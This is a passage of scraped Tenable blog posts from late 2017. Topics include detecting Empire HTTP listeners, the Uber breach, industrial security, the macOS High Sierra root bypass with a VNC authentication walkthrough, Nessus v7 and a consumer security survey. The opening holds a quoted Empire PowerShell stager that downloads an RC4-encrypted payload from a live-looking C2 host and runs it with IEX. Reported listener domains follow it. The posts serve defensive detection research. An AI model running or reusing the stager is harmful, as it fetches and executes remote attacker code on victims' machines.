$wc.Proxy;$K=[SystEm.TeXT.EncOdING]::ASCII.GEtByteS('9bd4b7087332164f0bd38400f1485f6f');$R={$D,$K=$ARgs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUNT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXOr$S[($S[$I]+$S[$H])%256]}};$ser='xxxx://read32.ddns.net:8080';$t='/admin/get.php';$wC.HEAderS.ADd("Cookie","session=P9ax+ES/3uPoTFnzu45H+xlR9ms=");$data=$WC.DOWnLOAdData($sEr+$t);$Iv=$DaTa[0..3];$dAta=$data[4..$DaTa.LEnGTH];-jOIn[ChAr[]](&
$R $DaTa ($IV+$K))|IEX

I also found it interesting that few listeners changed the default Server field
from Microsoft-IIS/7.5. The following table lists the non-default Server values
that I observed.

Server Value

Count

Microsoft-IIS/8.5

7

Microsoft-IIS/9.0

1

Microsoft-IIS/10.0

1

BigIP

1

Apache

1

Apache/2.4.6

1

web012

1

nginx/1.8.0

1

To my knowledge, there is no such thing as IIS 9.0. I’m pretty sure the
versioning jumped from 8.5 to 10.0.

Finally, I found SSL usage in conjunction with Empire to be fairly interesting.
I counted 47 self-signed certificates among the discovered servers. More
intriguing to me is the amount of certificates issued by Let’s Encrypt. It’s
been Let’s Encrypt’s long-standing policy to not police content and I’m
certainly not going to argue against them. Especially since I don’t have
sufficient information to determine if any of the servers are actually
malicious. As such, I’m just going to present the data without further comment.
I’ve broken the domains up into two groups: domains verified to have Empire HTTP
listeners and unreachable servers.

Verified Empire HTTP Listeners

power-shell.net

companysurveys.com

prohockeynews.org

changeme.mefound.com

web02.allcleardata.com

nvwmi64.nt

Unreachable

driverupdatesystem.com

mswordupdates.com

windowstechinfo.co.uk

40xpr0.cdn-microsoft.com

cdn.cloudfiare.ch

creditscore.crownfinancialconcepts.org

www3.akuncapital.com

firstbankcardservices.com

www1.hudsontalentagency.com

c2.ippsaonline.com

www.sharedmz.com

sogood.24hr.com

aldreboende.net

sso.dhow.xyz

streaming.threenow.online

catalog.precisionpartiesebook.com


CONCLUSION

Little mistakes add up. Not just for the blue team but for the red team, too.
Take advantage of your adversaries’ mistakes when you can. In this case, you can
use plugin 99592 to help find any Empire HTTP listeners in your environment.

Image may be NSFW.
Clik here to view.





THE BAD, THE UGLY AND THE CYBER IMMORAL - THANK YOU, UBER

November 28, 2017, 9:43 am
Next Tenable Delivers Industrial Security
Previous Identifying Empire HTTP Listeners
0
0
Image may be NSFW.
Clik here to view.

Technology, business and morality are not mutually exclusive, but rather
fundamentally intertwined into the fabric of how our society operates and will
have to increasingly operate in the future. As information about us is leveraged
at the very core of modern economies, users have every right to expect a
reasonable standard of care when it comes to keeping their personal information
secure. And companies have a legal requirement to do just that. Security is far
from perfect and we all acknowledge that breaches may still occur.

The Uber breach and subsequent coverup displayed not only a disregard for the
law, but more fundamentally a disdain for their customers and basic morality
responsibility. Uber not only failed to protect the information they were
collecting about their customers -- thus causing them potential harm -- they
chose to cover up the breach and subject those individuals to further risk by
not meeting their notification responsibilities.

There are already a number of class action lawsuits against Uber, alleging the
company was negligent in protecting consumer data. That sounds about right.

A digital society and economy require the establishment of a reasonable standard
of care that ensures basic cyber hygiene practices are maintained by all
organizations. While corporations may have resisted such a concept in the past,
the inevitability of cyber attack and the possibility of breaches now has
responsible boards of directors and corporate leaders looking for such clarity
and guidance. All parties are finally saying “enough is enough.” Maybe that
means some good change is around the corner.

Image may be NSFW.
Clik here to view.





TENABLE DELIVERS INDUSTRIAL SECURITY

November 29, 2017, 6:39 am
Next Detecting macOS High Sierra root account vulnerability (CVE-2017-13872)
Previous The Bad, the Ugly and the Cyber Immoral - Thank you, Uber
0
0
Cyber-Physical Security is a Growing Problem
Image may be NSFW.
Clik here to view.

Organizations are continuously leveraging new data and information capabilities
to accelerate their business processes and deliver greater value to customers.
As a result, industries such as energy, utilities, and manufacturing are
becoming increasingly digital and connected. But with new technology come new
challenges.

As physical operations systems, such as industrial control systems (ICS) and
supervisory control and data acquisition (SCADA) devices connect to information
networks – often labeled as the IT/OT convergence – business leaders must
consider the added risk to their production environments.

These systems play a pivotal role in our national, economic and public safety.
Unfortunately, ICS/SCADA systems were not designed with security in mind.
Recently, threats targeting these critical environments have gained increased
recognition with headline-grabbing news such as Stuxnet and Industroyer/Crash
Override. US-CERT released an advisory citing analysis by the Department of
Homeland Security (DHS) and the FBI detecting ongoing efforts by malicious
actors targeting U.S. critical infrastructure.

With increased connectivity, organizations can no longer rely on air-gaps.
Furthermore, security by obscurity is not justified. Recently, critical
infrastructure has become collateral damage in widespread incidents, such as
WannaCry and Petya/Not Petya. While these attacks did not specifically target
ICS/SCADA systems, they caused significant downtime and revenue loss for a
number of organizations.


INDUSTRIAL SECURITY FROM TENABLE

The growing threats targeting critical infrastructure and the rapid convergence
of IT with OT are what led Tenable to research and develop our latest product,
Industrial Security. With this launch, we’re doubling down on our commitment to
empower organizations to understand and reduce cyber risk across the modern
attack surface, including ICS/SCADA.

Industrial Security is designed to help cross-functional teams of information
security and operations engineers understand their cyber risk and protect
operational performance.

By leveraging the non-intrusive, passive capabilities of Nessus Network Monitor,
Industrial Security includes new ICS/SCADA capabilities for asset discovery and
vulnerability detection on critical infrastructure, which require a
non-intrusive approach to vulnerability management. Nessus Network Monitor
provides continuous asset discovery, passive vulnerability detection, and
multi-segment management.


IT’S BETTER TOGETHER - TENABLE AND SIEMENS

Recognizing that OT security is a complex issue that is impossible to solve by a
single vendor, Industrial Security is backed by a strategic partnership with
Siemens. Together, we have combined proven vulnerability management from Tenable
with Siemens’ domain expertise.

Historically, IT solutions have not been able to solve OT problems because IT
vendors did not understand the core goals and priorities of operational
engineers. Leveraging the successful history and deep knowledge of Siemens,
Industrial Security was purpose-built for OT environments.

Siemens brings decades of industrial expertise. Through its dedicated
cybersecurity service, Siemens serves as an integrator helping customers secure
their OT environments. This groundbreaking partnership gives energy and utility
companies safe and continuous visibility into their production networks. Powered
by Siemens, Industrial Security helps companies clearly visualize their OT
attack surface and manage it more confidently by drawing on Siemens’ domain
expertise. Siemens helps customers translate insights into action by
understanding the operational implications of security information, while
prioritizing critical risks to better protect assets.

Image may be NSFW.
Clik here to view.

Search
RSSing.com

--------------------------------------------------------------------------------





DETECTING MACOS HIGH SIERRA ROOT ACCOUNT VULNERABILITY (CVE-2017-13872)

November 29, 2017, 1:14 pm
Next Detecting macOS High Sierra root account without authentication
Previous Tenable Delivers Industrial Security
0
0
Image may be NSFW.
Clik here to view.

On November 28, 2017 a software developer (Lemi Orhan Ergin) reported a critical
flaw in macOS High Sierra which allows any local user to log in as root without
a password after multiple attempts. The vulnerability was originally thought to
only be exploitable if you had physical access to the computer, but our
researchers have been able to exploit this vulnerability to elevate privileges
over an authenticated Secure Shell (SSH) session using a lower privileged
account and remotely using Virtual Network Computing (VNC) if screen sharing is
enabled.


UNDERSTANDING THE ROOT CAUSE

Patrick Wardle provides a very in-depth discussion on the root cause (no pun
intended) of the issue. When a person (authorized or unauthorized) tries to
login to a macOS High Sierra system and the account is not enabled (i.e. root),
a new account is created with the password supplied to the GUI. Even if the
password is empty, a new account will be created with a blank password.
Regardless of attempting to log in over the keyboard, VNC, or over an
authenticated SSH session, the new account is created on the first attempt, and
then you are able to login the second attempt.

If you are a home user and have not enabled SSH or VNC, then you are not at risk
to remote attacks. For corporate environments, this vulnerability is very real
problem, as most of the management tools use remote access like SSH and VNC.
Many management systems, like Nessus® and Tenable.io™, use SSH to perform
management operations. Therefore, organizations that have users with macOS High
Sierra computers are at extreme risk to this vulnerability.


DETECTING VULNERABLE HOSTS

We are releasing several plugins to detect vulnerable hosts. Plugin #104814
detects whether patch (Security Update 2017-001) has been applied on the target
host. Plugin #104848 tries to confirm the existence of a vulnerability by
escalating privileges from a non-admin/non-root user to a root user. The plugin
is only enabled when ‘safe checks’ are disabled since it changes the system
state by disabling the root account if the host is vulnerable and has a blank
root password set. Please review ‘Advanced Scan Policy Steps’ for instructions
to enable this plugin.

 * macOS 10.13 root Authentication Bypass (Security Update 2017-001) (104814)
 * macOS 10.13 root Authentication Bypass Direct Check (104848)

Image may be NSFW.
Clik here to view.


ADVANCED SCAN POLICY STEPS

When executing the macOS 10.13 root Authentication Bypass Direct Check (104848)
plugin, we recommend scanning systems with a non-root account. To set-up a scan
for this vulnerability, you will need to follow these steps:

1. Add a new scan and choose advanced scan.

Image may be NSFW.
Clik here to view.

2. Next, add the credentials. Remember to use an account but set the “Elevate
privileges with” to “Nothing.” The key to using this plugin is to use the same
account that scan with, but no escalation is authorized. All the systems you are
scanning need to have the same account, which is common for scanning.

Image may be NSFW.
Clik here to view.

3. Next, disable all other plugins, and then enable only the plugin 104848.

Image may be NSFW.
Clik here to view.

(Disable all other plugins)

Image may be NSFW.
Clik here to view.

(Search for the plugin)

Image may be NSFW.
Clik here to view.

(Enable the single plugin)

4. Disable Safe Checks. This setting can be found under ‘Advanced’ in the
setting menu.

Image may be NSFW.
Clik here to view.



5. After selecting the plugins, add in the target range and scan your targets.

Image may be NSFW.
Clik here to view.


HOW DOES THE PLUGIN WORK?

Plugin #104848 exploits the privilege escalation vulnerability to verify the
system is vulnerable. The plugin works as follows:

 1. Nessus or Tenable.io will scan the system with the account you supplied in
    the advanced policy. Note that this must be a non-root account. After
    logging in, the scanner will attempt to run a command as the root user,
    authenticating with a blank password. If the host has the root account
    disabled and is vulnerable, this will cause the host to enable the root
    account and set a blank password, even though the attempted command will
    fail.
 2. The scanner attempts to run this command again, and if the host is
    vulnerable it will now succeed.
 3. If root access is granted, then the plugin runs a clean-up process that does
    the following:
     1. Disables the root account
     2. Removes the blank password hash for the root account

Image may be NSFW.
Clik here to view.


WRAPPING UP

We continue to research this vulnerability, and investigate different ways to
detect the vulnerability. When we have new information, we will release
additional plugins.

This vulnerability is a real and present danger to all organizations and should
be patched immediately. Apple recently released a patch to resolve this
vulnerability. Customers with a tightly controlled patch cycle or change control
process should consider asking for an exception for the patch, as allowing
systems vulnerable to this privilege escalation to go un-patched for any period
of time could be devastating to your network. Should a malicious user gain
access to one of these systems, the attacker could begin causing all sorts of
havoc on the network for some time.

Image may be NSFW.
Clik here to view.







DETECTING MACOS HIGH SIERRA ROOT ACCOUNT WITHOUT AUTHENTICATION

November 30, 2017, 11:40 am
Next From Off-the-Rack to Custom Tailored?
Previous Detecting macOS High Sierra root account vulnerability (CVE-2017-13872)
0
0
Image may be NSFW.
Clik here to view.

Yesterday, Tenable™ released two plugins to detect macOS High Sierra installs
which allow a local user to login as root without a password after several login
attempts. Both plugins require authentication, however, there was one scenario
where a user could log in over VNC protocol with the root account and no
password if screen sharing was enabled. Today, we are releasing a plugin to
remotely detect the vulnerability without authentication.


CONFIRMING THE VULNERABILITY

One of my colleagues initially reported that exploitation was possible remotely
over VNC after trying against his personal laptop. To confirm the report, I
fired up tightVNC (an open source VPN server/client) and tried to exploit the
issue on an lab box with “Screen Sharing” enabled (see screenshot below). I ran
into a problem were tightVNC couldn't connect to OSX (more on this later). I
then tried another VNC client, realVNC, and was able to successfully exploit the
issue. After two attempted logins with root and a blank password, the VNC client
drops you to a desktop on the remote host, as root. Now it’s time to look into
the VNC protocol, and figure out how we can write a remote check for this!

Image may be NSFW.
Clik here to view.


DELVING INTO THE VNC PROTOCOL

Anytime you want to learn a new protocol, a good place to start is the RFC. The
RFC for VNC can be found here: https://tools.ietf.org/html/rfc6143

The RFC refers to the protocol as RFB (remote frame buffer). In order to exploit
the vulnerability, we need to figure out how to perform authentication over the
VNC protocol. The first step is to connect to the host and receive a banner,
which looks something like this:

RFB protocol version = 3.889

Next, we send a similar banner string to the server (ending in a new line), and
receive a response for the server that contains the supported authentication
types (response decoded below):

Server Auth Types:
30,33,36,35

The RFC doesn’t mention anything about these authentication types. I needed to
figure out what these were, so I loaded up the debug log for realVNC and saw the
following:

 2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: processing security types message
 2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: Server offers security type Ard(30)
 2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: Server offers security type [unknown secType 33](33)
 2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: Server offers security type [unknown secType 36](36)
 2017-11-30T00:45:25.175Z TNS5872L vncviewer[13452]: Child: 12148: CProtoPreV5: Server offers security type [unknown secType 35](35)

So realVNC didn’t know what any of these types were, other than type 30, which
they have labeled as Ard. A few Google searches later and we found that Ard
stands for “Apple Remote Desktop”. No wonder tightVNC didn’t work, as the
application only supports the RFC standard authentication types.

To use that type, we send security type 30 (0x1E) to the server, and extract the
response which contains parameters for the authentication. Here is this response
in wireshark:

Image may be NSFW.
Clik here to view.

Looks like Diffie Hellman! The generator value is always two bytes and is first
in the packet. The key length is next and is a two byte integer. The prime
modulus and public key follow and are the same size as the key length. So far,
the debugging output of the plugin outputs this:

RFB protocol version = 3.889
Server Auth Types:
30,33,36,35
Doing apple auth!
ARD Material:
  Generator     : 0002
  Key Length    : 128
  Prime Modulus : ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece65381ffffffffffffffff
  Public Key    : a1ef2769ecfa51e2913751a3c51e3fabde0732466915fe0f65cf0aa61f468a929850717f4258a9449da3ba92e3a7ab07d12bb503ea34f079c98837c40dce8cfd123c3bf6ffbef49c6ea42abda1a80d317bd001dc6545da46d4697b5b90a26ef5f859983c2c0b4f09d29883344b05da3222ee268460687c2d8544df62cb2f49b5

So, the obvious thing we need to do is generate our own DH key-pair and
calculate the shared secret. What’s next?

After a bit more Googling and wireshark analysis, we learn that the username and
password are sent using AES encryption (using ECB mode), with the key being the
MD5 value of the shared secret. The username/password are sent in a 128 byte
blob. The first 64 bytes is for the username, the last 64 is for the password.
The username and password are null terminated and the remaining space is padded
with random bytes. Here is an example of the blob with username admin, password
FooBar12 (before we encrypt the data):

Image may be NSFW.
Clik here to view.

To complete the authentication, we need to send the AES encrypted password blob,
plus our public DH key and the server will send a four byte integer to indicate
success/failure. 0 is success, 1 is failure. Now we can write our remote check!


EXPLOITING THE VULNERABILITY

Exploiting the vulnerability is easy. We try to log in using root and a blank
password multiple times (four times max) using the process described above. If
we are successful logging in, then the remote host is vulnerable.


THE NESSUS® PLUGIN

Plugin 104885 was created to exploit the issue remotely over VNC. You must have
“safe checks” disabled in order for this run to plugin. This is because
successful exploitation will enable the root account, so there is a bit of
cleanup involved afterward if you find any affected boxes with the plugin. You
need to both disable the root account, and patch the underlying vulnerability.

Image may be NSFW.
Clik here to view.


WRAP-UP

Apple has already released a patch for this vulnerability. This is a critical
vulnerability by any standard, so please take all necessary steps to patch your
systems as soon as possible. If the patch can’t be applied for some reason,
please disable screen sharing if it's not needed. If it is needed, then enable
the root account and set a strong password.
Image may be NSFW.
Clik here to view.





FROM OFF-THE-RACK TO CUSTOM TAILORED?

December 4, 2017, 6:42 am
Next Announcing Nessus Professional v7
Previous Detecting macOS High Sierra root account without authentication
0
0
A Government Perspective on the Changing CDM Landscape
Image may be NSFW.
Clik here to view.

As the Continuous Diagnostics & Mitigation Program (CDM) begins its next phase
of task orders, it is useful to look back at the earlier stages of the program
to help us understand the importance of changes now being implemented in the
program’s contractual and programmatic structures.

CDM began as a group of GSA Schedule 70 Blanket Purchase Agreements (BPAs),
awarded in August 2013 to 17 companies. The first four task order awards were
for tools, with choice of vendor based on lowest price for each respective tool.
These were followed by Continuous Monitoring as a Service (CMaaS) task order
awards, organized into six different government agency groups.

To compete for CMaaS task orders, contractors architected solutions that
included the tools they selected from the CDM Approved Product List. Upon the
award of each CMaaS task order, the winning contractor set about implementing
their solution for all agencies in the CDM “Group,” regardless of the tools
already in place at a particular agency. For some agencies, this was not a
problem because they already had the same tools, and CDM simply provided them
with additional product and integration funded by DHS. For others, however, this
created a conflict between existing agency IT contracts and architecture and the
new CDM solution. In some cases, this conflict led to a slowdown of CDM
implementation across the agency. With most task orders having only a three-year
period of performance (and some even less), the impact of such slowdowns on
implementation was substantial.

One major challenge to successful CDM rollout has been simply educating the
federal workforce about the value of CDM to their organization. As one
front-line IT manager put it, “If people understand that CDM will ultimately
improve our quality of service, we’ll get that ownership buy-in we need to make
it work.” At Tenable, we have captured these types of insights from CDM CISOs,
PMs and other government and private-sector experts in an ebook, CDM From the
Frontlines. Please visit to read these perspectives on the program, lessons
learned and tips for successful task order performance.

Looking ahead to phase three of the CDM program, the government is shifting its
approach. The next round of CDM task orders, labeled “Dynamic and Evolving
Federal Enterprise Network Defense” (DEFEND), will be structured so as to allow
for more flexibility in individual agency solutions. Recognizing that
establishing a common cybersecurity platform across the federal government is a
basic goal of CDM, the new structure still allows for individual agency-specific
tailoring that should enhance CDM acceptance and speed implementation across
individual agencies.

DEFEND task orders will be awarded under the GSA Alliant contract. Alliant has
57 prime contractors, including 14 of the 17 original CDM BPA holders (and 5 of
the 6 CDM BPA task order awardees). The DEFEND task orders will be awarded, with
all options exercised, for a six-year period of performance – twice that of most
BPA task orders. The task orders will be cost-plus-award fee, providing
substantial incentive for strong technical performance, with the product
purchases being made on a cost-reimbursable basis. Perhaps most importantly, the
DEFEND task order awards will initially be for services only, with a post-award
opportunity for government-contractor collaboration that will enable each agency
to have substantial and meaningful input into their CDM solution architecture,
including product/tool selection.

To enable this post-award collaboration, the government is decoupling the tools
from the task orders. GSA is standing up a new CDM-specific Special Item Number,
or SIN, on GSA Schedule 70, where approved products are available for purchase
after task order award. Those products currently on the CDM Approved Products
List will be grandfathered into the new SIN, and a continuous review process
will be put in place, enabling timely technology refreshment going forward.

Under this decoupled approach, the final decisions as to which to include in a
given agency CDM solution will most likely be made as part of the post-award
Request for Service, or RFS, process that will take place between the agency and
the task order prime contractor. The agency groups will stay the same under
DEFEND as under the BPA – the key difference is the RFS process, which will
enable a more tailored approach for each agency within the group. The task order
awards under DEFEND will be, for practical purposes, single-award IDIQ
contracts, with each agency-specific RFS acting as a task order within the CDM
DEFEND task order. Through the RFS process, an agency will be able to bring its
internal cyber teams to the table with the CDM contractor and work out a
solution that resolves conflicts between the CDM solution and pre-existing
solutions already in place within the agency and its component organizations.


READ "CDM FROM THE FRONTLINES"

Get insights and best practices from industry experts on implemening and
supporting CDM.

Read More
Image may be NSFW.
Clik here to view.





ANNOUNCING NESSUS PROFESSIONAL V7

December 11, 2017, 9:00 pm
Next A Clarification about Nessus Professional
Previous From Off-the-Rack to Custom Tailored?
0
0
New capabilities give security practitioners, consultants and pen-testers
greater flexibility
Image may be NSFW.
Clik here to view.

We’re pleased to announce Nessus Professional v7. More than 20,000 organizations
today use Nessus Professional and there are more than a million and a half
Nessus users worldwide. You, the Nessus community, have made Nessus one of the
most important and trusted solutions in the industry.

Over nearly 20 years, Nessus has become the gold standard for security
practitioners and consultants who want fast and accurate point-in-time scans.
Starting with version 7, we are intensifying our focus on performance and
accuracy, so you can get the job done even faster and more confidently.


NESSUS V7 – A JOURNEY TO GREATER FLEXIBILITY AND PERFORMANCE

We’ve decided to focus the development of Nessus to make it the most efficient
solution for security practitioners, consultants and pen-testers. As such,
during the lifetime of the 7.x release, you’ll experience several enhancements
to achieve that goal.

In the first half of 2018, we’re planning to release our new high-performance
engine, and we’re going to dramatically speed up the installation time. In
addition, it will lower the load on the system during scans, enabling you to
scan faster and scan more hosts at the same time.

EASILY TRANSFERABLE LICENSE

Starting with 7.0, we’re relaxing the licensing check that previously prevented
you from using Nessus in certain cloud environments or on a live distribution
like Kali Linux. Also, with v7, the 10-day wait period to transfer your license
has been completely removed, making it quicker to transfer your license between
computers. With v7, you can install and reinstall Nessus without any waiting
period. Install it on a USB stick and work from there. Install it in your cloud
and stop worrying about being “locked out” because the MAC address of the system
changed after a reboot. We’re thrilled to make this change because it will
enable you to use Nessus in a more flexible and creative way.

REPORTING ENHANCEMENTS

There are also some great enhancements to Nessus Professional reports. With v7,
you can add a custom name and/or logo to reports, as well as auto-email reports
upon scan completion. The name/logo customization is particularly valuable for
consultants and others who want to personalize Nessus reports. And automated
emailing saves time and makes it easier to share results with those who need to
get the information quickly.


NESSUS REIGNS SUPREME

The foundation is as powerful as ever. Nessus – which also powers Tenable.io and
SecurityCenter – is the world’s most trusted vulnerability assessment technology
for security practitioners and consultants because of its:

 * High-speed accurate scanning and low false positives
 * Complete vulnerability scanning for one low cost
 * Support for more technologies and coverage of more vulnerabilities than
   competitive solutions
 * Unlimited entitlement for IP addresses and scans – scan as many IPs and run
   as many assessments as you want
 * Ability to correlate scan data with popular pen-testing tools such as
   Metasploit, Core Impact, Canvas and ExploitHub



GET MORE INFORMATION

 * If you’re a current user and want to learn more about Nessus Professional v7,
   including a message from Nessus creator Renaud Deraison, visit "What’s New In
   Nessus Professional v7"
 * Learn more about Nessus features, benefits and resources, including the
   latest plugins
 * Start a free 7-day trial of Nessus Professional

JOIN THE CONVERSATION – ONLINE OR IN PERSON

We’ve launched a new Tenable Community. Join the Nessus Professional group for
Nessus Professional v7 announcements and conversation! There’s much more in
store for Nessus in 2018 – join the community to stay in the loop!

Have a happy holiday period and we hope to see you in the new year at our
inaugural user conference, Edge, March 6-9, 2018 in Los Angeles!

Image may be NSFW.
Clik here to view.





A CLARIFICATION ABOUT NESSUS PROFESSIONAL

December 13, 2017, 8:08 am
Next New Study: Many Consumers Lack Understanding of Basic Cyber Hygiene
Previous Announcing Nessus Professional v7
0
0
Image may be NSFW.
Clik here to view.

To our valued Nessus community,

We recently launched a new Tenable Community platform to provide better customer
interaction, between customers and with us at Tenable. The new platform combines
both the Community and Support in a single location to provide you with a more
seamless experience. We migrated all Tenable support customers and existing
community members to the new platform on Monday, December 4th. As part of the
rollout we created a new Nessus Professional group in the community yesterday,
and inadvertently turned on notifications for every post. This triggered a
cascade of emails for a subset of Nessus Professional customers for
approximately two hours yesterday. We apologize to all customers who were
affected by this error.

Upon learning of this issue yesterday, our team immediately identified and
quickly resolved it. We are currently implementing system changes to ensure no
new notifications will be sent to group members unless you update your own
notification preferences. Also, customers will only be added to Collaboration
Groups upon their consent. As an extra precaution, we have temporarily disabled
the community site as we update the settings. Once the community site is back
online we’ll provide instructions on how to update your preferences. In the
meantime, if you are in a group and would like to be removed, please email
community@tenable.com directly and we will remove you.

We understand this was annoying and we apologize. This mistake is below the
standard we set for ourselves to provide you, our valued customers, with a great
experience. We understand the trust that you place in Tenable and we take that
responsibility extremely seriously. You have our commitment that nothing like
this will happen again.

In spite of this unfortunate error, I’m very excited by the new community site
-- I look back in time to our original support “channel” for Nessus (venerable
mailing lists) and see the contrast and potential to enable each one of you to
better share your feedback, knowledge and tips regarding our products, and I
simply can’t wait for our team and myself to interact with you this way.

Separately, I also wanted to clarify some of the recent updates to Nessus
Professional v7 specific to the API functionality. Nessus has become the gold
standard for security practitioners who want fast, comprehensive and accurate
point-in-time scans. Starting with version 7, we’ve decided to focus exclusively
on this use case and dedicate our development to it. I originally designed
Nessus to be used by an individual practitioner or consultant from within the
interface. It was never intended for use in a purely automated fashion, using
the API to run scans remotely and extract the data into another system. In fact,
the first version of Nessus didn’t even have any form of command line support.
As a result, we never built any safeguards in the API preventing a script from
misusing it and overloading the scanner. Ultimately we decided to let go of this
API after having seen some misuse of this functionality which stretched the
capabilities of the scanner.

For users who need to initiate and manage scans remotely, we have built a much
better user experience in Tenable.io, which offers a robust, supported and
better documented API, along with richer reporting options and the ability to
manage and federate multiple scanners.

Another point I’d like to cover is the removal of multi-user support in Nessus
Professional v7. In the past, you could create multiple, independent users in
Nessus Professional v6 and prior versions. We evaluated this feature and
realized it adds confusion and falls short of expectations since users can’t
share results, so we decided to remove it as well.

These changes were done in the spirit of clarifying our product portfolio so we
can focus our development efforts on the features that matter – and what
practitioners actually use. Less than 2% of users use the remote scan API, and
there are only a handful of scanners out there with multiple users. We believe
using our engineering resources to make the scanner more efficient, flexible and
scalable rather than focus on corner use cases is the right strategy to
providing you with the best experience.

For users who need fast, accurate, point-in-time vulnerability assessment, we
want to empower you to get your job done and give you the power and flexibility
you need. I’m excited to say that that’s precisely what we’re delivering with
Nessus Professional v7. In addition to ongoing improvements in performance and
vulnerability coverage, we also made the Nessus Professional license easily
transferable (eliminating the 10-day waiting period), removed the “computer
tie-in” so you can now install Nessus on a bootable USB stick or cloud instance,
enabled you to include your own tailored branding in reports and added automated
report delivery upon scan completion.

You can find more information about Nessus Professional v7 here. If you have any
questions or concerns, do not hesitate to contact us at support@tenable.com.

I’d like to thank each of you for being loyal Nessus users. We are committed to
continuing on our heritage of innovation with continual development and
improvements to our entire product portfolio. We look forward to delivering
advancements that make you more successful, efficient and secure.

Thank You,

Renaud Deraison

Co-founder and CTO

Image may be NSFW.
Clik here to view.







NEW STUDY: MANY CONSUMERS LACK UNDERSTANDING OF BASIC CYBER HYGIENE

December 18, 2017, 5:00 am
Next Congress Achieves Real IT Modernization Progress
Previous A Clarification about Nessus Professional
0
0
Image may be NSFW.
Clik here to view.

Data breaches have been a headache for many years and for a long time there
seemed to be a general apathy about them. Our sense was that things may have
changed in the wake of the most severe breach ever – the theft of 145 million
social security numbers and other sensitive data from Equifax – which leaves
most Americans with the burden of having to monitor for identity theft for the
rest of their lives.

Against this backdrop, we decided to find out how aware Americans are of
cybersecurity threats and risks, how concerned they are about getting their
information stolen, and what they might be doing, or more importantly, not doing
about it. We also wanted to learn if recent breaches have caused Americans to
change their behavior at all. Tenable recently commissioned a survey, conducted
online by Harris Poll of more than 2,000 U.S. adults, to determine how data
breaches – and media attention around them – are impacting consumers’
perceptions about their online security and their behavior.

Going into this project, our hypothesis was that because of all the recent
breaches, Americans are more aware of security breaches than they were in the
past, but that they likely continue to use poor security practices. The results
are worse than we anticipated. According to the survey, more than 9 in 10
Americans (94%) have heard news stories about security breaches in the past 12
months, but among them, more than 2 in 5 (43%) have not changed their online
habits as a result of these stories. This suggests many Americans may not
understand that they have a role in accountability when it comes to taking
specific actions to safeguard their personal data.


CYBER ILLITERACY IS RAMPANT

While many Americans are aware of breaches in the news, it appears that about 1
in 5 (21%) aren’t sure if they have been impacted by security breaches in the
past 12 months. Only 12 percent of Americans say their personal information has
been stolen by hackers due to a security breach in the past 12 months. But given
that the Equifax breach exposed sensitive data of as many as 143 million
Americans, that number is statistically impossible. Given the Yahoo! breach and
countless others, this data suggests an alarming lack of understanding about the
pervasiveness of recent breaches and the risks they pose to average Americans.
It’s cyber illiteracy.

While most Americans (94%) have heard of news stories about security breaches in
the last year and a majority say they are worried about risks associated with
activities as basic as use of public Wi-Fi hotspots and online shopping, many
still have not taken some critical steps to protect their data. For example,
only 25 percent of Americans have implemented two-factor authentication on their
devices to protect their personal information in the past 12 months, even though
security experts and major online services and technology companies like
Facebook and Google strongly encourage it. Although more than 2 in 3 Americans
(68%) say they have avoided opening links/attachments from unsolicited emails or
texts in the past 12 months, we suggest more Americans do this as this has been
an industry best practice for security since the early 2000s. In addition, only
about 3 in 10 Americans who have heard of any news stories on security breaches
in the past 12 months (32%) have reduced their use of public Wi-Fi or unknown
hotspots as a result, which could mean many still frequently do this – a major
no-no.

Many Americans do not seem very confident about the security of their data, as
nearly 2 in 5 (37%) said they think it’s likely their personal information will
be stolen as a result of a security breach in the next six months. Additionally,
it appears many Americans are worried about their personal information getting
stolen as a result of some of the most common online activities. While 63
percent are worried about their data getting stolen when connecting to public or
unknown Wi-Fi hotspots, nearly 3 in 5 (58%) are worried about their personal
information being stolen when online shopping, half (50%) are worried when
banking online, and 35 percent are concerned when connecting with their
friends/family through social media.


ROUGHLY ONE IN TWO AMERICANS LACKS BASIC CYBER HYGIENE

The survey demonstrates that nearly all consumers are aware of security
breaches, but many do not take some basic precautions to protect their data. In
the past 12 months, only 56 percent of Americans have used a password to lock
their computer and only 45 percent use a PIN to lock their mobile devices.
Roughly half of Americans (53%) say they have made their account passwords more
complicated in the past 12 months, and 15 percent have used a password
management tool. Another emerging authentication technology – biometrics – is
still not widespread, with only 19 percent of Americans reporting that they have
implemented it on their devices in the past 12 months. This is a surprising
result given the fact that Apple has offered the user’s thumbprint as a security
measure since 2013.

Even when the minimal is offered, Americans may not be capitalizing on some of
the easiest ways to stay on top of their personal cybersecurity. Using credit
monitoring services, which Equifax and other breach victims offer for free for a
year, is one of the many ways to monitor for identity fraud. So we were
surprised to find that so few Americans have signed up for such a service. Only
roughly one-quarter of Americans (26%) have used a credit monitoring service to
protect their personal information in the past 12 months, and only 12 percent
have used an identity monitoring service.

Another basic tactic is to update, update, update and FAST! Apps that are
downloaded onto devices can offer a popular inroad for hackers to compromise
devices and steal data if the apps have security vulnerabilities, which is
fairly common. Hackers who uncover the security weaknesses can exploit them only
as long as they haven’t been patched. So, minimizing that window of opportunity
is key to staying safe. While some Americans seem to be trying to stay on top of
their software updates, many still aren’t updating their apps in a timely manner
when the updates are available. Fourteen percent of smartphone users wait more
than a week to update apps on their smartphone (or never do it) after receiving
a prompt. Meanwhile, 13 percent of computer users wait more than a week to
update the apps on their computer – including 3 percent who wait longer than a
month after receiving a prompt to do so and 5 percent who don’t update apps on
their computer at all.

CONSUMER SECURITY CHECKLIST

 1. Where applicable, enable two-factor authentication for all online services.
 2. Update your apps and computers within 24 hours of receiving a notification.
 3. Assign strong passwords to your computer, mobile phone and tablet – and
    don’t share them with others.


WHAT DOES THIS MEAN FOR ENTERPRISES?

Organizations are scrambling to shore up their defenses in light of all the
